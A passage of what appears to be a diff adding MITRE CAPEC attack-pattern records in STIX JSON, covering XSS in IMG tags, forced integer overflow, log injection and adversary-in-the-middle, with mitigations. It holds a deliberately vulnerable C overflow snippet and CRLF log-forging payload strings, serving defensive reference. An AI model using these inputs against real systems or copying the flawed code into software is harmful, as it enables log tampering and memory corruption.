"source_ref": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-91", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/91.html" + } + ], + "id": "attack-pattern--78cd63b9-a303-4e6b-8460-0270b0e2510b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: XSS in IMG Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. 
At worst the attacker can execute arbitrary code.", + "external_references": [ + { + "external_id": "CAPEC-92", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/92.html" + }, + { + "external_id": "CWE-190", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/190.html" + }, + { + "external_id": "CWE-128", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-122", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-196", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/196.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Integer Overflows", + "external_id": "03", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Integer-Overflows" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-547", + "source_name": "reference_from_CAPEC", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511" + }, + { + "description": "Robert C. 
Seacord, Secure Coding in C and C++", + "external_id": "REF-548", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Forced Integer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544", + "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The first step is exploratory meaning the attacker looks for an integer variable that they can control.

Experiment

  1. The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.

Exploit

  1. The integer variable is forced to have a value out of range which set its final value to an unexpected value.

  2. The target host acts on the data and unexpected behavior may happen.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can manipulate the value of an integer variable utilized by the target host.", + "The target host does not do proper range checking on the variable before utilizing it.", + "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)" + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow an integer by inserting an out of range value." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8ed81c8-ed80-43a6-b0a2-c7ead943f317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. 
For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3d51c21-4f4c-4136-b351-f5c1b935b7cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d64dd927-79c3-45ef-948b-e86799536d9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always do bound checking before consuming user input data.", + "id": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94ebd003-5a86-4654-a505-d70213867164", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. 
Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. 
See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

  2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--902d0a46-bb02-4c00-9c12-63139df6d6ca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow tainted data to be written in the log file without prior input validation. 
An allowlist may be used to properly validate the data.", + "id": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87217e96-f97b-4c88-8e77-1ff3c6f211f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1004a1b-30e7-4057-b6bd-640ad3d2d21c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use static analysis tools to identify log forging vulnerabilities.", + "id": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65f16c8f-4535-4431-928b-ab9c8d336a93", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", + "id": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb05b9ba-1c0b-4cf6-a5cf-94af69a17b39", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets the communication between two components (typically client and server), in order 
to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.\n ", + "external_references": [ + { + "external_id": "CAPEC-94", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-593", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "description": "Adversary-in-the-Middle", + "external_id": "T1557", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557" + }, + { + "description": "Man-in-the-middle attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "M. 
Bishop, Computer Security: Art and Science, 2003, Addison-Wesley", + "external_id": "REF-553", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Man-in-the-middle attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-633", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "Kyle Chivers, What is a man-in-the-middle attack?, 2020--03---26, NortonLifeLock Inc.", + "external_id": "REF-634", + "source_name": "reference_from_CAPEC", + "url": "https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html" + }, + { + "description": "Man in the middle (MITM) attack, Imperva", + "external_id": "REF-635", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/" + }, + { + "description": "Jerry Decime, Settling the score: taking down the Equifax mobile application, 2017--09---13", + "external_id": "REF-636", + "source_name": "reference_from_CAPEC", + "url": "https://www.linkedin.com/pulse/settling-score-taking-down-equifax-mobile-application-jerry-decime/" + } + ], + "id": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Middle (AiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Man-in-the-Middle / MITM", + "Person-in-the-Middle / PiTM", + "Monkey-in-the-Middle", + "Monster-in-the-Middle", + "On-path Attacker" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964" + ], + "x_capec_can_precede_refs": [ + 
"attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

  2. Techniques
    Perform a sniffing attack and observe communication to determine a communication protocol.
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

  2. Techniques
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Use Intercepted Data Maliciously: The adversary observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

  2. Techniques
    Prevent some messages from reaching their destination, causing a denial of service.
", + "x_capec_extended_description": "\n Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.\n These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b" + ], + "x_capec_prerequisites": [ + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "An attacker can eavesdrop on the communication between the target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.", + "The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption." + ], + "x_capec_skills_required": { + "Medium": "This attack can get sophisticated since the attack may use cryptography." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Public Keys are signed by a Certificate Authority", + "id": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5264115d-5e8a-4dbd-95fe-60d77876319d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt communications using cryptography (e.g., SSL/TLS)", + "id": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6822ab84-ff48-490b-8bff-9eb89ae991ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" 
+ ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3043134e-bd5e-43ae-93a4-4f2f31bda6cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exchange public keys using a secure channel", + "id": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", 
